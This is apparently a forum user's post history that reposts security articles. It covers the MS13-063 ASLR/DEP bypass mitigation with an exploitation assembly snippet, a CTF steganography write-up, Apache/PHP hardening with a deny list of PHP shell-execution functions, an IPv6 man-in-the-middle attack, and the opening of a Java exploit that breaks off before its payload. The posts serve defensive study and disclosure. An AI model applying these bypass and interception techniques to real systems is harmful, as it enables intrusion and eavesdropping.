Everything posted by Nytro

  1. Mitigating the LdrHotPatchRoutine DEP/ASLR bypass with MS13-063

swiat, 12 Aug 2013 10:51 AM

Today we released MS13-063, which includes a defense in depth change to address an exploitation technique that could be used to bypass two important platform mitigations: Address Space Layout Randomization (ASLR) and Data Execution Prevention (DEP). As we've described in the past, these mitigations play an important role in making it more difficult and costly for attackers to exploit vulnerabilities. The bypass technique that has been addressed by MS13-063 was described by Yang Yu of NSFocus Security Labs at the CanSecWest security conference earlier this year. This bypass was also independently discovered by other researchers and was used by VUPEN in one of their exploits for the Pwn2Own 2013 contest as well. A few months ago, we released EMET 4.0, which included a mitigation for this specific bypass. In this blog post, we wanted to provide some background on how the bypass works and how it has been addressed by MS13-063.

How the bypass works

The bypass takes advantage of a predictable memory region known as SharedUserData that exists at a fixed location (0x7ffe0000) in every process on every supported version of Windows. On 64-bit versions of Windows prior to Windows 8, this region contains pointers to multiple functions in the 32-bit version of NTDLL that is used by WOW64 processes, as shown below:

The presence of these pointers at a predictable location in memory can enable an attacker to bypass ASLR if they have the ability to read anywhere in memory. In this case, the bypass technique takes things a step further by taking advantage of one of the functions listed above: LdrHotPatchRoutine. This function is part of the hotpatching support provided by Windows, and one of the noteworthy things it does when called is load a DLL from a path that has been passed in as a field of the first parameter.
This means that if an attacker can use a vulnerability to call LdrHotPatchRoutine, they could execute arbitrary code as a side effect of loading a malicious DLL of their choosing, such as from a UNC path, and thus bypass DEP implicitly. Depending on the vulnerability that is being exploited, it can be fairly straightforward for an attacker to trigger a call through the pointer to LdrHotPatchRoutine in SharedUserData with a controlled parameter, thus bypassing both ASLR and DEP. Use after free vulnerabilities involving C++ objects with a virtual table pointer are particularly well-suited to this technique. These vulnerabilities have become a preferred vulnerability class of exploit writers in recent years. The reason use after free issues are particularly amenable is that attackers typically control the entire content of the C++ object that has been freed prior to a virtual method call. As such, an attacker only needs a virtual method call site where they can control the virtual table pointer being called through and the first parameter that is passed to the virtual method. For example, if we assume that EDX points to memory that is controlled by the attacker:

mov ecx, [edx+0x4]  ; load pointer to fake object into ECX
mov eax, [ecx]      ; load fake virtual table pointer 0x7ffe0344 into EAX
push ecx            ; push pointer to controlled content as first parameter
call [eax+0xc]      ; call [0x7ffe0344 + 0xc], which points to LdrHotPatchRoutine

As a result of the above sequence, LdrHotPatchRoutine will be called and the DLL path referred to in the fake structure that is passed as the first parameter will be loaded, thus bypassing both ASLR and DEP.

How the fix works

The bypass described above relies on the fact that a pointer to LdrHotPatchRoutine can be found at a predictable location in memory. As such, one way to mitigate this bypass is to simply eliminate the predictable pointer to LdrHotPatchRoutine from SharedUserData.
This is the approach taken in the security update for MS13-063. After installing this update on Windows 7 64-bit, we can see that not only has the pointer to LdrHotPatchRoutine been eliminated, but in fact all other image pointers have been eliminated as well:

As a result, not only is the LdrHotPatchRoutine bypass mitigated, but so is any other bypass that relies on leveraging the image pointers that were present in SharedUserData on 64-bit versions of Windows. The potential for abusing one or more of these pointers was something we were aware of during the development of Windows 8, and as such we took steps to eliminate all image pointers from SharedUserData on both 32-bit and 64-bit versions of Windows 8. This is why Windows 8 was not susceptible to this bypass. It should be noted that although MS13-063 removes all image pointers from SharedUserData on 64-bit versions of Windows 7, there is still one image pointer present in SharedUserData on 32-bit versions of Windows 7 and earlier (the SystemCall function pointer).

For those who are curious, the pointers that were originally stored in SharedUserData have now been moved to an exported global data structure named LdrSystemDllInitBlock in NTDLL. This data structure is populated during process initialization with the required pointers. Since NTDLL is randomized by ASLR, an attacker cannot reliably predict where these pointers will be stored in memory.

Bounty program

Although we were already aware of the underpinnings of this bypass before it was publicly described, it is a great example of a technique that could have qualified for our recently announced Mitigation Bypass Bounty Program. This bounty program offers exceptional rewards (up to $100,000) for novel exploitation techniques that affect the latest versions of our products. In this case, the bypass was generic, could be made reliable, had reasonable requirements, applied to high impact user mode application domains, and had elements that made it novel.
Discovering and mitigating exploitation techniques of this nature can help us make our platform safer and more secure by breaking the techniques that attackers rely on to develop reliable exploits.

- Matt Miller and William Peteroy

Special thanks to our colleagues in Windows Sustained Engineering for their work on shipping this defense in depth update.

Source: https://blogs.technet.com/b/srd/archive/2013/08/12/mitigating-the-ldrhotpatchroutine-dep-aslr-bypass-with-ms13-063.aspx?Redirected=true
  2. Steganography: What your eyes don’t see

Soufiane Tahiri, August 14, 2013

Steganography is the art of hiding information to prevent detection of a hidden message. It has been used throughout history in many methods and variations: the ancient Greeks shaved the heads of messengers and tattooed the secret message on them; once the hair grew back, the message remained undetectable until the head was shaved again. Many ingenious techniques and methods were used by ancient civilizations. Later, around World War II, invisible inks offered a common form of undetectable writing: an innocent-looking letter could contain a very different message written between its lines. It's a security through obscurity approach: theoretically, apart from the sender and the recipient, no one is supposed to suspect the existence of the hidden message. Digital technology has given us new ways to apply steganography, including intriguing techniques such as hiding information in digital images. Steganography and cryptography belong to the same "big family": where cryptography scrambles a message so it cannot be read, steganography just hides it so it does not attract attention, and this is the advantage that steganography has over cryptography. Through this article I'll demonstrate how a hidden "key" is stored in an "innocent looking" picture; the file we will study is a problem taken from a CTF (Capture the Flag, a computer security competition).

Analyzing the target

The file we know has a hidden message within it is a JPG file that simply looks like this (check references for download link):

The original file name was "spamcarver", which is itself a hint. According to Wikipedia, file carving is the process of reassembling computer files from fragments in the absence of filesystem metadata; the carving process makes use of knowledge of common file structures, information contained in files, and heuristics regarding how filesystems fragment data.
Fusing these three sources of information, a file carving system infers which fragments belong together. This is enough to push us to explore the JPEG file structure.

An in-depth look into the JPEG file format

Every image file that uses JPEG compression is commonly called a JPEG file and is considered a variant of the JIF (JPEG Interchange Format). Most images captured by recent devices such as digital cameras are stored in Exif (Exchangeable image file format), a standardized format for metadata interchange. Since the Exif standard does not allow color profiles, most image editing software stores JPEG in JFIF format and also includes the APP1 segment from the Exif file to carry the metadata in an almost-compliant way; the JFIF standard is interpreted somewhat flexibly. Technically, every JPEG file, just like any other object, has a beginning, or header, called "Start of Image", and a trailer called "End of Image": every JPEG file starts with the binary value 0xFFD8 and ends with the binary value 0xFFD9. A JPEG file contains binary segments introduced by 0xFF, called markers, with a basic format like this: 0xFF + marker number (1 byte) + data size (2 bytes) + data (n bytes). Some markers are used to describe data; they appear before the Start of Scan marker, which begins the JPEG image stream that ends with the End of Image marker. Here is a basic JPEG file format structure:

This seems to be enough to start studying our given image.

Problem analysis

Before firing up our hexadecimal editor, let's do some "routine" tasks, such as checking the picture with some standard tools to get additional information about this file. On a Windows 7 machine, I installed GnuWin32 to get some *nix commands like "file", which determines file type, and applied it to our target.
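The marker layout described above can be walked mechanically. Below is a minimal sketch in Python (not part of the original article; `iter_jpeg_markers` is a name invented here) that iterates over a JPEG's metadata segments under the generic 0xFF + marker + length + data layout:

```python
import struct

def iter_jpeg_markers(data):
    """Yield (marker, payload) pairs from a JPEG byte string.

    Assumes the generic segment layout: 0xFF + marker byte +
    2-byte big-endian length (which includes itself) + payload.
    Parsing stops at SOS (entropy-coded data) or EOI.
    """
    assert data[:2] == b"\xff\xd8", "not a JPEG: missing SOI (0xFFD8)"
    pos = 2
    while pos < len(data):
        assert data[pos] == 0xFF, "expected a marker prefix byte"
        marker = data[pos + 1]
        if marker in (0xD9, 0xDA):      # EOI / SOS: no structured payload here
            yield marker, b""
            return
        (size,) = struct.unpack(">H", data[pos + 2:pos + 4])
        yield marker, data[pos + 4:pos + 2 + size]
        pos += 2 + size                 # skip marker (2) + length + payload
```

For example, feeding it a file that begins `FFD8 FFE0 ...` would first yield marker 0xE0 (the APP0/JFIF segment) with its payload.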
Installing GnuWin32

Start by downloading the automated GnuWin32 download tool (GetGnuWin32-0.6.3.exe, link in the references section), then extract it to the desired folder. The installation process is quite simple even though it's command-line based: using the Windows command prompt (CMD), navigate to the extracted location and run "download.bat". This will automatically download all the available GnuWin32 packages to the same directory; if you are prompted to do something, just accept the defaults. After the download is finished, staying in the command prompt, install all downloaded packages by typing:

C:\PathWhereYouDownloaded\GetGnuWin32\> install c:\gnuwin32

This will install all downloaded packages to the c:\gnuwin32 directory. The last step is to add this new directory to the environment variables: right click on "My Computer", then "Properties", and click on "Advanced system settings" (or something similar). In the System Properties window click the "Environment Variables" button; in the Environment Variables window (as shown below), select the "Path" variable in the System Variables section and click the Edit button. Modify the path line by adding ";c:\gnuwin32" (without quotes, as shown below):

Let's now use the "file" command:

As expected, this is a valid JPEG file stored in JFIF format. We can get even more information using another tool called ExifTool (download link in the references section), which can help us handle and manipulate image metadata:

Until now everything seems legit and the file seems to be a valid JPEG file, which leaves us the ultimate and efficient method: doing it by hand, the old-school way! Let's open our image file using a hexadecimal editor and focus on its structure; we know that every JPEG file starts with 0xFFD8 and ends with 0xFFD9:

FFD8 is the Start of Image marker; FFE0 is an application marker used to store digital camera configuration and a thumbnail image, and it doesn't interest us.
Let's try to find the trailer of our file (the End of Image marker), which is equal to 0xFFD9. Using your hexadecimal editor, try to find the value "FFD9". To do this in WinHex, click on "Find Hex Values"; in the window that appears, type in the hexadecimal value you want to find, then click "OK".

And guess what: two hits were found, which is not "very" normal. Click on the first hit to get to its offset.

Things get more intriguing: basically this means that something has been appended to the JPEG file. The JPEG file should end at FFD9, but immediately after the supposed end of image an interesting 504B0304... appears, followed by a lot of other binary data. If you are accustomed to reverse engineering you can easily see that this is in fact the header of a normal PKZip file; even if you are not, a quick Google search will reveal it. Let's now study the binary data that appears after the End of Image marker.

A look into the PKZip file format

Each PKZip file (or simply ZIP file) mainly has this structure:

It may contain many local file headers, many blocks of local file data and many data descriptors; of course there are lots of other technical details that I won't explain in this paper.
Each local file header is structured in the following manner:

Signature: the signature of the local file header is always 0x504B0304
Version: the PKZip version needed for archive extraction
Flags: bit 00: encrypted file; bits 01-02: compression option; bit 03: data descriptor; bit 04: enhanced deflation; bit 05: compressed patched data; bit 06: strong encryption; bits 07-10: unused; bit 11: language encoding; bit 12: reserved; bit 13: mask header values; bits 14-15: reserved
Compression method: 00: no compression; 01: shrunk; 02: reduced with compression factor 1; 03: reduced with compression factor 2; 04: reduced with compression factor 3; 05: reduced with compression factor 4; 06: imploded; 07: reserved; 08: deflated; 09: enhanced deflated; 10: PKWare DCL imploded; 11: reserved; 12: compressed using BZIP2; 13: reserved; 14: LZMA; 15-17: reserved; 18: compressed using IBM TERSE; 19: IBM LZ77 z; 98: PPMd version I, Rev 1
File modification time: bits 00-04: seconds divided by 2; bits 05-10: minute; bits 11-15: hour
File modification date: bits 00-04: day; bits 05-08: month; bits 09-15: years from 1980
CRC-32 checksum: CRC-32 algorithm with 'magic number' 0xdebb20e3 (little endian)
Compressed size: if the archive is in ZIP64 format, this field is 0xffffffff and the length is stored in the extra field
Uncompressed size: if the archive is in ZIP64 format, this field is 0xffffffff and the length is stored in the extra field
File name length: the length of the file name field below
Extra field length: the length of the extra field below
File name: the name of the file, including an optional relative path. All slashes in the path should be forward slashes '/'.
Extra field: used to store additional information. The field consists of a sequence of header and data pairs, where the header has a 2-byte identifier and a 2-byte data size field.

In addition to this, every PKZip file has a signature marking the end of the Central Directory, 0x504B0506; in other words, every ZIP file starts with 0x504B0304 and ends with 0x504B0506.

Let's get back to our JPEG file where we left it. Here I marked with different colors the bytes that need explanation, based on the table above:

Signature: 0x504B0304
Version: 0x14 = 20 decimal, meaning version 2.0
Flags: bit 02: compression option
Compression method: 08: deflated
File modification time: 0x02F4 (little endian)
File modification date: 0x419F (little endian)
CRC-32 checksum: 0x9CD950D4 (little endian)
Compressed size: 0x2DE3 = 11747 bytes
Uncompressed size: 0xE299 = 58009 bytes
File name length: 0x8 bytes
Extra field length: 0x1C
File name: 0x2020202020202020 = eight space characters
Extra field: 0x5455 extended timestamp, size: 5 bytes

We know enough to think about extracting this ZIP file from the given JPEG file: we know the header of the file, how the file is structured, and that the archive contains a file named "        " (eight spaces) with no extension!
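The fixed 30-byte part of the local file header described above unpacks cleanly with Python's struct module. The following sketch (not from the original article; `parse_local_header` is a name invented here) decodes the fields we just walked through by hand:

```python
import struct

# Fixed part of a PKZip local file header, little endian, per the
# field table above: signature (4s), version, flags, method,
# mod time, mod date (5 x H), CRC-32, compressed size,
# uncompressed size (3 x I), name length, extra length (2 x H).
LOCAL_HEADER = struct.Struct("<4sHHHHHIIIHH")

def parse_local_header(data, offset=0):
    (sig, version, flags, method, mtime, mdate,
     crc32, comp_size, uncomp_size, name_len, extra_len) = \
        LOCAL_HEADER.unpack_from(data, offset)
    assert sig == b"PK\x03\x04", "not a local file header"
    name_start = offset + LOCAL_HEADER.size
    return {
        "version": version,              # e.g. 20 = version 2.0
        "method": method,                # 8 = deflated
        "compressed_size": comp_size,
        "uncompressed_size": uncomp_size,
        "file_name": data[name_start:name_start + name_len],
    }
```

Running this over the bytes at the start of the embedded archive would recover exactly the values tabulated above (deflated, 11747 bytes compressed, 58009 bytes uncompressed, an eight-space file name).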
The easiest way to "dump" the ZIP embedded within the JPEG file is to copy all bytes from the header of the ZIP to its trailer: that is, from the first 0x504B0304 to the End of Central Directory record (0x504B0506), located in general at the end of the file. Using your hexadecimal editor, go to offset 0xCB8E to find the beginning of the zip file, then select all bytes up to offset 0xFA04, copy the data into a new file and save it as a ZIP file. If you are using WinHex, right click on the exact offset, then select "Edit -> Copy Block -> Into New File". A "Save File As" window appears; give your file a name ending in .zip.

Checking the dumped ZIP file

Using the "file" command tells us that this is indeed a valid zip file:

C:\Users\Soufiane>file C:\Users\Soufiane\Desktop\stegano\dumpedPK.zip
C:\Users\Soufiane\Desktop\stegano\dumpedPK.zip; Zip archive data, at least v2.0 to extract

Now let's try to extract our compressed archive (you can use whatever software you want); I'll keep using the commands provided by GnuWin32:

C:\Users\Soufiane>unzip C:\Users\Soufiane\Desktop\stegano\dumpedPK.zip
Archive: C:/Users/Soufiane/Desktop/stegano/dumpedPK.zip
error: cannot create

Remember the name of the file inside the zip archive? An eight-space name, and this kind of file name can indeed cause unzipping problems. So let's get back to the dumped zip file and, using the hexadecimal editor, change the name to something more usual. What you have to do is perform a hexadecimal search (like the one we did before) for "2020202020202020" and change it to whatever you like. According to the PKZip file structure, you should find two hits: one at the beginning of the zip file and one at its end:

Change both occurrences the same way, save, and try to extract again:

C:\Users\Soufiane\Desktop\stegano>unzip C:\Users\Soufiane\Desktop\stegano\dumpedPK.zip
Archive: C:/Users/Soufiane/Desktop/stegano/dumpedPK.zip
inflating: NoSpaces

Yes!
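The manual copy-block step above can be sketched in a few lines of Python (not part of the original article; `carve_zip` is a name invented here). It finds the JPEG's End of Image marker, then copies everything from the first local-file-header signature after it to the end of the file, which matches the "select until the end of the file" approach used with WinHex:

```python
def carve_zip(jpeg_bytes):
    """Carve a ZIP appended after a JPEG's End of Image marker.

    Keeps everything from the first 0x504B0304 ("PK\x03\x04")
    found after 0xFFD9 through the end of the buffer, which
    includes the End of Central Directory record (0x504B0506).
    """
    eoi = jpeg_bytes.find(b"\xff\xd9")
    assert eoi != -1, "no JPEG End of Image marker found"
    start = jpeg_bytes.find(b"PK\x03\x04", eoi)
    assert start != -1, "no ZIP local file header after the image"
    return jpeg_bytes[start:]

# Usage sketch (paths are placeholders):
#   with open("spamcarver.jpg", "rb") as f:
#       open("dumpedPK.zip", "wb").write(carve_zip(f.read()))
```

Note that `find` locates the *first* 0xFFD9; on a file where that byte pair also occurs inside the compressed image data, the offsets would need checking by hand, exactly as the article does with the two WinHex hits.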
A file called "NoSpaces" has been created; let's see what kind of file this is:

The zip file in reality contained another JPEG file. Rename the extracted file to "NoSpaces.jpeg" and let's see how it looks:

It's a working JPEG file containing the key we were asked for!

Conclusion

In this paper we learned that steganography is not only an enigmatic art strictly based on mathematics and complex algorithms: we saw how a simple image file can hide any other file simply through handling and understanding file structures. I tried to introduce some common file structures, namely JPEG and PKZip, and we saw how a hexadecimal editor can help us investigate files. Hope you learned something new!

References

http://www.creangel.com/papers/steganografia.pdf
http://en.wikipedia.org/wiki/Steganography
http://en.wikipedia.org/wiki/File_carving
http://www.faqs.org/faqs/jpeg-faq/part1/section-15.html
http://www.utica.edu/academic/institutes/ecii/publications/articles/A0B1F944-FF4E-4788-E75541A7418DAE24.pdf
http://www.pkware.com/documents/casestudies/APPNOTE.TXT
http://members.tripod.com/~petlibrary/ZIP.HTM
http://en.wikipedia.org/wiki/List_of_file_signatures
http://www.pkware.com/documents/APPNOTE/APPNOTE-6.3.0.TXT
https://users.cs.jmu.edu/buchhofp/forensics/formats/pkzip.html#general

Target used: Steganography-UnZipMe.zip
GetGnuWin32: getgnuwin32.sourceforge.net

Source: Steganography: What your eyes don’t see
  3. Yes, and the list isn't complete. Why don't you come up with some additions? :->
  4. Hacker Proofing Apache & PHP Configuration

Aditya Balapure, August 14, 2013

SECURING APACHE

Apache has truly been one of the dominant web servers of the World Wide Web. It's one of the best open source projects: a web server for both the Windows and *NIX platforms, maintained by the open source community under the Apache Software Foundation. First we will learn techniques for hardening our Apache configuration for a safer web experience.

Security 101 – Deny All

Remember that the best security is to deny everything and allow only the specific services, ports and firewall rules the configuration requires. The same goes for Apache: we follow a whitelisting approach, denying everything and allowing only what is required. Hence what we have done here is block access to all directories. These configuration changes have to be made in the main Apache configuration file or, if you are using a newer version of Ubuntu/BackTrack R3, under /etc/apache2/conf.d/security. Now let's allow what we really require: access to a particular folder XYZ. So we make some more changes to the configuration file.

Security 102 – Disabling Directory Indexing

This vulnerability displays all the files in a particular directory if a base file such as index.php or index.html is not present. In a few default configurations it's enabled by default, making this exposure possible. We can remove it by:

Security 103 – Disable HTTP TRACE Method

The TRACE method simply echoes back the received request so a client may see what changes or additions have been made. Attackers can abuse this functionality to gain access to sensitive information in headers, such as cookies and authentication data. It may be disabled by:

Security 104 – Removing the Default Files

Having the default Apache files on a live web server is really bad. These may be used to fingerprint the Apache version, and at times even the operating system.
Removing them ultimately helps to obfuscate our running web server.

Security 105 – Disable Server Tokens and Signatures

It's a good security practice to disable server signatures.

Security 106 – Remove Default Error Pages

It's good security practice to remove the default error pages offered by Apache. This makes it more difficult for attackers to identify which web server or version you're running. Hence it's advised to create custom pages for errors, bugs and functionality problems in a particular application.

Security 107 – Disable WebDAV

WebDAV stands for Web Distributed Authoring and Versioning, which aids in the download/upload of files and the ability to work with those files on a remote web server. It's basically required to run an SVN server; for public websites it is advisable to disable WebDAV due to its high susceptibility to denial of service attacks via PROPFIND, PROPPATCH or LOCK requests with a huge XML body. Here is how we remove/disable WebDAV:

Security 108 – Set Up a chroot Environment for Your Website

chroot is a process that changes the apparent disk root to another root directory: once we have changed the root to another directory, we cannot access files outside that particular directory. It's also known as a jailed environment, or chroot jail. When working in a chroot environment, an application cannot access the parent disk and other resources. This is a good security practice because it helps prevent malicious users of websites hosted on the server from accessing the operating system's files. Similar instances may be created for different websites hosted on the same server, which blocks malicious scripts or viruses on one site from accessing another.

Security 109 – Distribute Ownership and Don't Be Root

It is recommended to avoid running Apache as the root user, since malicious users could gain full access to the whole server through potentially bad scripts.
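The original article illustrated these steps with configuration screenshots. As a hedged sketch only, several of the directives discussed above might look like the following, assuming Apache 2.2-style access control (Order/Allow); the directory paths are placeholders, not values from the article:

```apache
# Deny everything by default, then whitelist only what is needed
<Directory />
    Order Deny,Allow
    Deny from all
    Options None
    AllowOverride None
</Directory>
<Directory /var/www/XYZ>
    Order Allow,Deny
    Allow from all
</Directory>

# Disable directory indexing
<Directory /var/www>
    Options -Indexes
</Directory>

# Disable the TRACE method
TraceEnable off

# Disable server tokens and signatures
ServerTokens Prod
ServerSignature Off
```

On Apache 2.4 the Order/Allow/Deny directives are replaced by Require, so the exact syntax depends on the version in use.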
If the web server hosts multiple sites, the files for different sites should be owned by different users. This helps prevent access from one site to another, so if one gets infected the others are safe.

Security 110 – Don't Forget to Install Security Updates

It's best to install the security updates and patches released as fixes for known vulnerabilities. This prevents our server from remaining susceptible to exploits published on open disclosure sites.

SECURING PHP

Now let's move on to securing our PHP configuration, to prevent the various server-side attacks that may be possible if it is left insecure.

Security 101 – Disable PHP Information

It is recommended to hide PHP information from the outside world, since this conceals the PHP version we run. If PHP information exposure is turned on, the PHP version may be visible in the HTTP headers. Here is how we disable it:

Security 102 – Log All Errors

It is always advised to log all PHP errors and prevent them from being displayed. Here is how to do it:

Security 103 – Disallow File Uploads

All types of file uploads should be disabled by default. If the application requires certain files to be uploaded, they should be thoroughly checked for proper extensions, parsed for malicious scripts and kept in a sandboxed location. All external data should be treated as unsafe and should not be trusted. Here is how to do it:

Security 104 – Disallow Remote Code Execution

If enabled, this option allows the application to retrieve data from a remote website through include() and similar constructs. It may allow an attacker to inject malicious URLs from his own websites and have them included and parsed by the local PHP interpreter, resulting in command execution. Disabling it is important to protect against code injection vulnerabilities. It's also advised to filter any input received from users.
Here is how we do it:

Security 105 – Disabling Privileged Functions

There is a long list of PHP functions which should be disabled to protect the PHP configuration:

exec – executes an external command.

<?php
echo exec('ls -A');
?>

passthru – executes an external program and displays raw output.

<?php
echo passthru('ls -A');
?>

system – executes an external program and displays the output.

<?php
echo system('ls');
?>

shell_exec – executes a command through the shell and returns the complete output as a string.

<?php
echo shell_exec('ls');
?>

proc_open – executes a command and opens file pointers for input/output.

proc_close – closes a process opened by proc_open and returns the exit code of that process.

popen – opens a pipe to the program specified in the command interpreter.

A few other functions which should be disabled are curl_exec, curl_multi_exec, parse_ini_file and show_source. Here is how we do it:

Security 106 – Limit PHP Access to the File System

In most web server setups it's strictly advised that web applications not be allowed to read files outside of the web root directory. All the web server files are generally located under /var/www unless customized. Hence we restrict PHP applications from acting outside this directory by using open_basedir, as shown below:

Security 107 – Turning On Magic Quotes

The magic quotes feature gives PHP the ability to automatically escape quotes, backslashes and NULs with a backslash, filtering any unwanted quotes which might have been passed by a malicious user to the application.
This might prevent XSS, SQL injection and some other attacks by a malicious user.

Security 108 – Disabling Register Globals

This directive takes input from GET, POST, session variables and uploaded files and makes it directly accessible as global variables. Suppose we have a URL http://www.example.com/xyz.php?input=TRUE with a query string at the end: any value entered will directly set the value of the variable, allowing a malicious user to inject any global variable into the code without any control. The easiest way to disable this is to include a line in the .htaccess file:

php_flag register_globals off

References

DIY: Harden Apache web servers with these tips - TechRepublic
Apache 2.0 Hardening Guide
10 Apache Security and Hardening Tips | Kyplex cloud security
Linux: 25 PHP Security Best Practices For Sys Admins
Dangerous php functions - Stack Overflow
PHP: Program execution Functions - Manual
PHP popen() Function
Configuration Auditing php.ini To Help Prevent Web Application Attacks | Tenable Network Security
https://www.owasp.org/index.php/Configuration#PHP_Configuration
php - Why is REGISTER_GLOBALS so bad? - Stack Overflow

Source: Hacker Proofing Apache & PHP Configuration
  5. Yes, I also looked through the source code and, obviously, it's not complete. It is an attempt to rewrite the Windows XP operating system from scratch. The chances of success are extremely small, given that: 1. It is an EXTREMELY complex project. 2. The knowledge required to contribute to the project is beyond advanced level. 3. There are very few people who can contribute, and who actually do. Many years will pass before a stable version is reached, and that is if the project continues at all. Still, in terms of usefulness, it is very interesting to look through the source code and understand how the Windows kernel works.
  6. I also spent about 2 minutes looking out the window but didn't see anything. About how often do they appear? One every 5-10 minutes, or more rarely?
  7. What do you mean, 24/48? I think that salary is lower than the minimum wage; I don't even think it's legal for it to be that low. What job is it? At Carrefour, Cora or Kaufland it's probably better. In programming, even internships and part-time jobs pay from 1000 RON up.
  8. What was the problem? That we only accept projects made from scratch and don't accept copied source code? Actually, here you get banned for that sort of thing; it's not just that it doesn't get posted in RST Power. Make something crappy, but make it yourself: you don't take code off Google, slap "by Blondas" on it, and call yourself a programmer. Well, in your case, you took code from several sources and put it in one place. Which amounts to the same thing: zero.
  9. RST is on the first page of search results for queries like "invitatie filelist", "invitatii filelist" and "cont filelist". Just as many users who ended up here searching for "Conquiztador killer" went on to evolve, we hope that the wave of users arriving here through such searches will also learn new things and evolve.
  10. Researchers demonstrate how IPv6 can easily be used to perform MitM attacks

Many devices are simply waiting for router advertisements, good or evil.

When early last year I was doing research for an article on IPv6 and security, I was surprised to learn how easy it was to set up an IPv6 tunnel into an IPv4-only environment. I expected this could easily be used in various nefarious ways. I was reminded of this when I read about a DEFCON presentation on using IPv6 to perform a man-in-the-middle attack on an IPv4-connected machine. I did not attend DEFCON, but the presenters Brent Bandelgar and Scott Behrens provided details in a blog post for their company Neohapsis as well as in their presentation slides. Moreover, they shared the source code of the tool they developed on Github. The attack refines the proof of concept of an attack possibility described in 2011, by making it also work against Windows 8 and providing a bash script that is supposed to work out of the box. This script will no doubt be popular among penetration testers, but it also shows possibilities for those with malicious motives. For me, the script didn't work right away, but some minor tweaks got it working, after which the traffic from my wife's Windows 7 laptop was flowing through my virtual Ubuntu server. And while I didn't even attempt to read the traffic generated by this 'husband-in-the-middle' attack, I could have done. I could also have performed a similar attack in a local Starbucks. The attack makes use of the fact that all modern operating systems support both IPv4 and IPv6 connections. This in itself is a good thing for the migration towards IPv6, as is the fact that the IPv6 connection, if available, takes precedence. Moreover, operating systems such as Windows 7 and 8 have DHCPv6, the IPv6 version of DHCP, enabled by default. This means that if they haven't already got an IPv6 connection, they will obtain one from any DHCPv6 server running on the local network.
This is what the Neohapsis researchers do to get machines to connect to their device. As this merely allows them to capture IPv6 traffic in a IPv4-only network, they then use a protocol called NAT64 to allow their server to route this traffic to the IPv4-Internet. NAT64 is one of several protocols used to make the migration towards IPv6 easier: it allows IPv6-only networks to connect to IPv4-only services on the Internet. NAT64 in a rogue set-up, with the NAT64 server on the right. It works by setting up a DNS server that returns IPv6 addresses in which the IPv4 address is embedded. If a request is made for the AAAA record (IPv6 address) of a domain, the response will be an address in some predefined /96 IPv6 subnet - that is, a subnet in which all but the final 32 bits are fixed. These 32 bits will be the A record (IPv4 address) for the same domain. Say, for example, the subnet is 2001:db9:1:ffff::/96 and a request is made for Virus Bulletin : Independent Malware Advice, then the response will be 2001:db9:1:ffff::6dc8:041a. Indeed, 6dc8:041a is the hexadecimal representation of 109.200.4.26, the IPv4 address of Virus Bulletin : Independent Malware Advice. Requests to this IPv6 address will then be routed through the server running NAT64 - in this case, the server set up by the attackers. They are thus able to see all traffic from the now IPv6-connected machine, except that in which the IP address is hard-coded. Of course, in principle this means they can only read traffic that isn't encrypted, but that still allows for many possible attacks with serious consequences. At the same time, the fact that the intercepting device runs on the same local network might make performing cryptographic timing attacks such as Lucky Thirteen easier. To see the possibilities for malware that is able to intercept all traffic, one just needs to look at a 2011 variant of the TDSS rootkit which set up its own IPv4 DHCP server. 
In that case, however, the malware had to compete with the real DHCP server, while in this case the fact that IPv6 always takes precedence over IPv4 means there is no such competition. The simplest way to fend off this kind of attack is to turn off IPv6 on devices that do not need it. This will, of course, hinder the migration towards IPv6 and may not be an option for transportable devices, as these may sometimes find themselves in an environment where IPv6 connectivity is needed. The researchers also mention RFC6105, an informational document published by the IETF on how to deal with rogue router advertisements, as a possible defence strategy. But ultimately, the best way to defend against these kinds of attacks will be to make sure the device always has an IPv6 connection. Attacks such as this one will not work on devices that are already IPv6-connected. Sursa: Virus Bulletin : Blog - Researchers demonstrate how IPv6 can easily be used to perform MitM attacks Vedeti link-urile.
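The address-embedding scheme the article describes is easy to reproduce. Below is a minimal sketch of my own (not the researchers' tool, and simplified compared to the real RFC 6052 address formats): it synthesizes a NAT64 address by appending the dotted-quad IPv4 address as the final 32 bits of a fixed /96 prefix.

```java
public class Nat64Synth {
    // prefix is the fixed /96 network part, e.g. "2001:db9:1:ffff::" from the article.
    // The four IPv4 octets become the last two 16-bit groups of the IPv6 address.
    static String synthesize(String prefix, String ipv4) {
        String[] o = ipv4.split("\\.");
        int hi = (Integer.parseInt(o[0]) << 8) | Integer.parseInt(o[1]);
        int lo = (Integer.parseInt(o[2]) << 8) | Integer.parseInt(o[3]);
        return String.format("%s%04x:%04x", prefix, hi, lo);
    }

    public static void main(String[] args) {
        // Reproduces the example above: 109.200.4.26 -> ...::6dc8:041a
        System.out.println(synthesize("2001:db9:1:ffff::", "109.200.4.26"));
    }
}
```

Run with the article's example prefix and 109.200.4.26 it prints 2001:db9:1:ffff::6dc8:041a, matching the AAAA response described above; the rogue DNS server simply performs this mapping for every A record it resolves.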
  11. Because the code is written in C, not in C++. Mirror: http://packetstormsecurity.com/files/download/122779/Formatul_Fisierelor_PE.pdf
  12. Mirror: http://www.exploit-db.com/wp-content/themes/exploit/docs/27516.pdf
  13. Oracle Java storeImageArray() Invalid Array Indexing Code Execution Site packetstormsecurity.com Oracle Java versions prior to 7u25 suffer from an invalid array indexing vulnerability that exists within the native storeImageArray() function inside jre/bin/awt.dll. This exploit code demonstrates remote code execution by popping calc.exe. It was obtained through the Packet Storm Bug Bounty program. import java.awt.image.*;import java.awt.color.*; import java.beans.Statement; import java.security.*; public class MyJApplet extends javax.swing.JApplet { /** * Initializes the applet myJApplet */ @Override public void init() { /* Set the Nimbus look and feel */ //<editor-fold defaultstate="collapsed" desc=" Look and feel setting code (optional) "> /* If Nimbus (introduced in Java SE 6) is not available, stay with the default look and feel. * For details see http://download.oracle.com/javase/tutorial/uiswing/lookandfeel/plaf.html */ try { for (javax.swing.UIManager.LookAndFeelInfo info : javax.swing.UIManager.getInstalledLookAndFeels()) { if ("Nimbus".equals(info.getName())) { javax.swing.UIManager.setLookAndFeel(info.getClassName()); break; } } } catch (ClassNotFoundException ex) { java.util.logging.Logger.getLogger(MyJApplet.class.getName()).log(java.util.logging.Level.SEVERE, null, ex); } catch (InstantiationException ex) { java.util.logging.Logger.getLogger(MyJApplet.class.getName()).log(java.util.logging.Level.SEVERE, null, ex); } catch (IllegalAccessException ex) { java.util.logging.Logger.getLogger(MyJApplet.class.getName()).log(java.util.logging.Level.SEVERE, null, ex); } catch (javax.swing.UnsupportedLookAndFeelException ex) { java.util.logging.Logger.getLogger(MyJApplet.class.getName()).log(java.util.logging.Level.SEVERE, null, ex); } //</editor-fold> /* Create and display the applet */ try { 